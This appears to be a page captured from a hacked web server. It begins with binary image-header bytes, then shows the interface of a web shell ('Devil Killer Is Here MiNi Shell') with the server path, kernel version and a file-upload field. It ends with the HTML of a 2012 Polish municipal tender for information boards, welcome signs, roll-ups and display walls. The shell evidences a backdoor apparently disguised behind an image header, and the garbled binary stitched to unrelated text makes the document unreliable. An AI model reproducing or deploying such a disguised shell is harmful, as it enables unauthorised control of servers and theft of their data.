JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120730/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120730/164975-N-2012.html

<p class="kh_header"><b>Zamość: Wykonanie tablic informacyjno - promocyjnych, witaczy, roll-up, ścianek  reklamowych w ramach projektu -    Rozwój i współpraca pierścieniowych gmin Polski Wschodniej</b><br>
<b>Numer ogłoszenia: 164975 - 2012; data zamieszczenia: 30.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Zamość , ul. Peowiaków 92, 22-400 Zamość, woj. lubelskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.mbnet.zamosc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie tablic informacyjno - promocyjnych, witaczy, roll-up, ścianek  reklamowych w ramach projektu -    Rozwój i współpraca pierścieniowych gmin Polski Wschodniej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Tablice informacyjno -promocyjne:
Tablice informacyjno-promocyjne - 69 szt. (wraz z montażem) jednostronnie zadrukowana, pełny kolor, o wymiarach dł. 135 cm x wys. 100 cm umieszczona w drewnianej oprawie na drewnianym stelażu zakończonym dachem jednospadowym wraz z montażem w wyznaczonych przez poszczególne gminy miejscach.
Tablice będą umieszczone w następujących gminach:
Gmina Ełk - 18 szt.
Gmina Sanok - 31 szt.
Gmina Suwałki - 5 szt.
Gmina Zamość - 15 szt.

Opis stelaża: wykonany z dwóch drewnianych słupów okrągłych o średnicy około 12 cm, słupy korowane i szlifowane, na górze z dachem jednospadowym. Wysokość słupów około 250 cm, zakończone dachem jednospadowym wykonanym z płaskiej deski lub płaskich desek zachodzących

 na siebie ułożonych poziomo na zakładkę, wzmocnionych dodatkowo pod spodem dwoma pionowymi deskami. Pod oprawą umieszczona pozioma poprzeczka wykonana z półwałka, łącząca słupy, słupy muszą posiadać odbojniki po zewnętrznej stronie, które czynią konstrukcje bardziej stabilną, wysokość odbojników - sięgające nie wyżej niż poziomej poprzeczki umieszczonej pod oprawą. Słupy łączone z dachem oraz oprawą za pomocą ocynkowanych wkrętów.
Słupy montowane w gruncie za pomocą kotwienia stalowego wraz z betonem na głębokość nie mniejszej niż 70 cm. Kolor impregnatu stelaża: dębowy lub podobny.
Opis oprawy tablicy: wykonana z półwałków o średnicy około 10-12 cm, tablica montowana do oprawy za pomocą ocynkowanych wkrętów, w oprawie ma być umieszczona tablica o wymiarach dł. 135 cm, wys. 100 cm, oprawa posiadająca z tyłu plecy zabezpieczające przed uszkodzeniami zewnętrznymi. 
Kolor impregnatu oprawy: dębowy lub podobny.
Opis tablicy: wymiary tablicy dł. 135 cm, wys. 100 cm, wykonana z nierdzewnej blachy ocynkowanej o grubości około 0,60 mm, zabezpieczona laminatem UV, wydruk pełny kolor, wodoodporny o bardzo dobrej jakości, odporny na działanie czynników atmosferycznych UV, opadów deszczu, śniegu, gradu itp. Informacje (tekst, zdjęcia, grafika), jakie będą umieszczone na wydruku przekaże Zamawiający oraz gminy partnerskie.(Gmina Ełk, Gmina Sanok, Gmina Suwałki). Grafika na wszystkich tablicach będzie posiadać wspólny element związany z promocją projektu (logo PO RPW, emblemat Unii Europejskiej, odwołanie słowne do Unii Europejskiej, odwołanie słowne do Europejskiego Funduszu Rozwoju Regionalnego - zgodnie zasadami promocji projektów dla Programu Operacyjnego Rozwój Polski Wschodniej 2007-2013). Wszystkie elementy tj. stelaż, oprawa, tablica pokryte muszą być powłoką odporną na działanie czynników atmosferycznych.
Zamawiający przekaże Wykonawcy informacje do wydrukowania na tablicach nie później niż trzy miesiące przed terminem wykonania. Wykonawca przedstawi projekt całości zamówienia (stelaż, oprawa, dach, tablica informacyjno-promocyjna) do zaakceptowania przez Zamawiającego, co najmniej miesiąc wcześniej przed terminem wykonania. Transport tablic leży po stronie Wykonawcy. Miejsce montażu tablic wskaże Zamawiający oraz Gminy Partnerskie (Gmina Ełk, Gmina Sanok, Gmina Suwałki).
Terminy wykonania:
- Gmina Ełk - 10 czerwiec 2013r.
- Gmina Sanok -15 październik 2013r.
- Gmina Suwałki - 15 październik 2013r.
- Gmina Zamość -10 czerwiec 2013r.

2. Witacze:
Zamówienie obejmuję: zaprojektowanie, wykonanie i montaż 24 sztuk witaczy: (6 dla Gminy Ełk, 6 dla Gminy Sanok, 3 dla Gminy Suwałki, 9 dla Gminy Zamość). Zamawiający przekaże wykonawcy zdjęcia, grafikę i tekst, jakie chciałby umieścić na każdym z witaczy. W ramach zamówienia Wykonawca zaprojektuje i przedstawi zamawiającemu po 2 propozycje projektu witacza dla każdej z gmin. Zamawiający zastrzega, że forma (kształt) witaczy ma być jednakowa dla wszystkich gmin. Witacze będą się różnić zamieszczoną: grafiką tekstem i kolorystyką. Witacze będą posiadać wspólny element związany z promocją projektu (logo PO RPW, emblemat Unii Europejskiej, odwołanie słowne do Unii Europejskiej, odwołanie słowne do Europejskiego Funduszu Rozwoju Regionalnego - zgodnie zasadami promocji projektów dla Programu Operacyjnego Rozwój Polski Wschodniej 2007-2013). Transport witaczy leży po stronie Wykonawcy. Miejsce montażu witaczy wskaże Zamawiający oraz Gminy Partnerskie (Gmina Ełk, Gmina Sanok, Gmina Suwałki)
-Konstrukcja: witacz ma być wykonany z kształtowników stalowych ze stali węglowej, kształtowników hutniczych gorąco-walcowanych lub profili zamkniętych gorąco-walcowanych. Konstrukcja ma zostać zabezpieczona antykorozyjnie: przez 2 warstwy powłoki lakierniczej lub ocynk, metoda spawana MIG/MAG w osłonie CO2.
-Poszycie: witacz wykonany z blachy ocynk / aluminium od 1-2mm, (kształtowane poprzez: 
cięcie laserem: frezowane na frezarce CNC, walcowane na walcarce CNC, zaginane krawędziowo na prasie krawędziowej CNC, malowanie proszkowe według patery RAL )
-Boki: witacz wykończony profilami maskującymi mocowania do konstrukcji nośnej.
-Fundament: wpuszczony w grunt wykonany z betonu - B20 (C 15/20) z wypuszczonymi kotwami.
-Grafika: niepodświetlana folia winylowa, folia odblaskowa (lakiernictwo i herb) lub kolorowy wydruk wielkoformatowy zabezpieczony laminatem UV, 
-Wymiary: wysokość ok:2,5 -3,0 m, szerokość ok.: 1,00-1,5 m
Witacze mają być wykonany precyzyjnie z dbałością o detale. Poprzez precyzyjne dopasowanie do siebie poszczególnych elementów produktu, gładkie wykończenie krawędzi, bez widocznych śrub i nitów, brak widocznych elementów łączeń.
Termin wykonania:
- Gmina Ełk- 01 wrzesień 2014r.
- Gmina Sanok - 01 wrzesień 2014r.
- Gmina Suwałki - 01 wrzesień 2014r.
- Gminy Zamość - 10 październik 2013r.
3.Roll-up
Przedmiot zamówienia stanowi dostawa 5 roll-up ( 2 dla Gminy Ełk, 1 dla Gminy Sanok, 1 dla Gminy Suwałki, 1 dla Gminy Zamość). Roll-up o wymiarach, co najmniej: szerokość 100cm wysokość 200cm. Konstrukcja wykonana z aluminium, tworzywo sztuczne gwarantująca szybki i łatwy montaż i demontaż. Podstawa w kolorze czarnym lub srebrnym. Wydruk graficzny w kolorze w wysokiej rozdzielczości nie mniejszej 720dpi. Zdjęcia i treść wydruku przekaże Zamawiający. Wykonawca przedstawi projekt grafiki i uzgodni ostateczny wygląd z Zamawiającym. W zestawie torba transportowa. W ramach zamówienia Wykonawca ma dostarczyć roll-up do siedzib poszczególnych gmin:
- Gmina Ełk, ul. Armii Krajowej 3, 19-300 Ełk, 
- Gmina Sanok, ul. Kościuszki 23, 38-500 Sanok, 
- Gmina Suwałki, ul. Kościuszki 71, 16-400 Suwałki,
- Gmina Zamość, ul. Peowiaków 92, 22-400 Zamość, 
Termin wykonania: 01 październik 2012 r. lub w terminie 14 dni od dnia podpisania umowy w przypadku podpisania umowy z wykonawcą w terminie po: 17 września 2012r.
4. Ścianki reklamowe
Przedmiot zamówienia stanowi dostawa 4 ścianek reklamowych z trybunkami wykonanymi na bazie kufra transportującego. (1 dla Gminy Ełk, 1 dla Gminy Sanok, 1 dla Gminy Suwałki, 1 dla Gminy Zamość). 
Wymiary konstrukcji po rozłożeniu: Szerokość ścianki (grafiki) ok. 375-415 cm, wysokość ścianki od 225 cm do 235 cm, głębokość 95 cm (ok 10 cm) 
Materiał: 
-konstrukcja ścianki: aluminium i  tworzywo sztuczne
-trybunka, kufer: tworzywo sztuczne
-grafika: wykonania na elastycznych panelach PCV. Panele mają być oklejone folią z wydrukiem w kolorze, wydruk cyfrowy w rozdzielczości nie mniejszej niż 1440 dpi, zabezpieczone laminatem piaskowym.
Wykończenie: Ścianki powinny być wykonane na konstrukcji umożliwiającej szybki i łatwy montaż i demontaż. Ścianka przystosowana do ustawienia po łuku. Panel graficzny wymienny mocowany za pomocą listew z magnesami, Panele maja ściśle do siebie przylegać tworząc jednolitą powierzchnie reklamową. Panele boczne mają zawijać się do tyłu. Zdjęcia i treść do wydruku graficznego na ściankę przekaże Zamawiający. Wykonawca przedstawi projekt grafiki i uzgodni ostateczny wygląd z Zamawiającym. Trybunka wykonana na bazie kufra transportującego do przewożenia ścianki. W komplecie należy dostarczyć blat na kufer transportowy, grafika na kufer, dwie lamy halogenowe. Kufer wykonany z materiału odpornego na zniszczenie. W rozmiarze pozwalającym na swobodne zapakowanie w nim konstrukcji i paneli graficznych. Kufer powinien posiadać kółka umożliwiające łatwy transport. Zdjęcia i treść grafiki na kufer przekaże Zamawiający. Wykonawca przedstawi projekt grafiki i uzgodni ostateczny wygląd z Zamawiającym. 
Wykonawca dostarczy instrukcję montażu i demontażu ścianki. 
W ramach zamówienia Wykonawca ma dostarczyć ścianki do siedzib poszczególnych gmin na adres:
- Gmina Ełk, ul. Armii Krajowej 3, 19-300 Ełk, 
- Gmina Sanok, ul. Kościuszki 23, 38-500 Sanok, 
- Gmina Suwałki, ul. Kościuszki 71, 16-400 Suwałki,
- Gmina Zamość, ul. Peowiaków 92, 22-400 Zamość, 
Termin wykonania: 15 styczeń 2013 r.

Przed rozpoczęciem druku na poszczególnych elementach przedmiotu zamówienia Wykonawca zobowiązany jest dostarczyć Zamawiającemu ich ostateczne projekty graficzne do zatwierdzenia. Minimalna wymagana trwałość kolorów i materiału wynosi 36 miesięcy od dnia protokolarnego odbioru. 
Przy wykonywaniu prac związanych z wykonaniem i montażem tablic oraz witaczy należy stosować materiały i urządzenia dopuszczone do obrotu i stosowania w budownictwie, posiadające stosowne aprobaty, certyfikaty i atesty Wykonawca udzieli 3 letniej gwarancji na materiał i robociznę w dniu bezusterkowego odbioru końcowego przedmiotu zamówienia, co znajdzie potwierdzenie w sporządzonym protokole odbioru. 
Obowiązkiem Wykonawcy jest utrzymanie porządku i ochrony mienia znajdującego się na 
terenie montażu i terenach przyległych. W zakres zamówienia wchodzą wszystkie niezbędne prace, usługi i materiały konieczne do wykonania zamówienia zgodnie z wymaganiami SIWZ, jak również pozostałe czynności, opłaty i koszty niezbędne dla prawidłowego wykonania przedmiotu zamówienia. 
Dokładne miejsca ustawienia witaczy i tablic zostaną uzgodnione z Wykonawcą w trakcie realizacji umowy. Zamawiający oraz gminy Partnerskie będą odpowiedzialne za wszelkie formalności związane z ustawieniem witaczy i tablic informacyjno-promocyjnych wynikające z przepisów prawa. 
Jeżeli w SIWZ przy opisie przedmiotu zamówienia wskazana została nazwa producenta, znak towarowy, patent lub pochodzenie w stosunku do określonych materiałów, urządzeń, itp. Zamawiający wymaga, aby traktować takie wskazanie jako przykładowe i dopuszcza zastosowanie przy realizacji zamówienia materiałów, urządzeń, itp. Równoważnych, o parametrach nie gorszych niż wskazane.
 
Wszystkie witacze, tablice, roll-up, ścianki reklamowe muszą zostać oznakowane zgodnie z Zasadami promocji projektów dla Programu Operacyjnego Rozwój Polski Wschodniej 2007-2013..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>art.67 ust.1 pkt.6 ustawy pzp</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.50.00-2, 30.19.21.70-3, 79.82.25.00-7, 39.29.41.00-0, 45.00.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.09.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku w w/w.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę oraz doświadczenie, potencjał techniczny, a także dysponuje osobami zdolnymi do wykonania zamówienia, do oferty należy dołączyć nastepujące dokumenty;

Wykazu wykonanych a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego,że te dostawy lub usługi zostały lub są wykonane należycie. 

- warunek zostanie spełniony jeżeli wykonawca przedstawi dokumenty potwierdzające  wykonanie 
2 usług odpowiadających opisowi przedmiotu zamówienia, tj.,  po 15 000,00 zł (każda ), brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku w w/w.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Kwalifikacje techniczne:Informacje i formalności konieczne do dokonania oceny spełniania wymogów:
 Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, korzystania z nich przy wykonywaniu zamówienia niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić  Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę oraz doświadczenie, potencjał techniczny, a także dysponuje osobami zdolnymi do wykonania zamówienia, do oferty należy dołączyć nastepujące dokumenty;

Wykazu wykonanych a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego,że te dostawy lub usługi zostały lub są wykonane należycie. 

- warunek zostanie spełniony jeżeli wykonawca przedstawi dokumenty potwierdzające  wykonanie 
2 usług odpowiadających opisowi przedmiotu zamówienia, tj.,  po 15 000,00 zł (każda ), brutto.

Warunki udziału
1. Sytuacja podmiotowa Wykonawców.
1.1.W celu wykazania spełniania przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy pzp., Zamawiający żąda przedłożenia wraz z ofertą następujących oświadczeń lub dokumentów:
Załącznik nr 3 - oświadczenie o spełnianiu warunków udziału w postępowaniu.
2. W przypadku, gdy Wykonawca będzie polegał na wiedzy i doświadczeniu, osobach zdolnych, do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
3. W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy w okolicznościach o których mowa w art. 24 ust. 1 ustawy Zamawiający żąda: 
Załącznik nr 4 - oświadczenie o braku podstaw o wykluczenia
Do formularza nr 4, Wykonawca zobowiązany jest załączyć;
1) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu- wystawionego niw wcześniej niż 3 miesiące przed upływem terminu składania ofert, załącznik nr 5
2) aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub w całości wykonania decyzji właściwego organu - wystawionego nie wcześciej niż 3 miesiące przed upływem terminu składania ofert, załącznik nr 6</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają nakładają obowiązek ich posiadania;

2) posiadania wiedzy i doświadczenia w tym względzie:

3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonywania zamówienia; 

4) sytuacji ekonomicznej i finansowej;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony i podpisany formularz ofertowy - załącznik nr 1.
2. Kosztorys ofertowy - załącznik nr 2.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
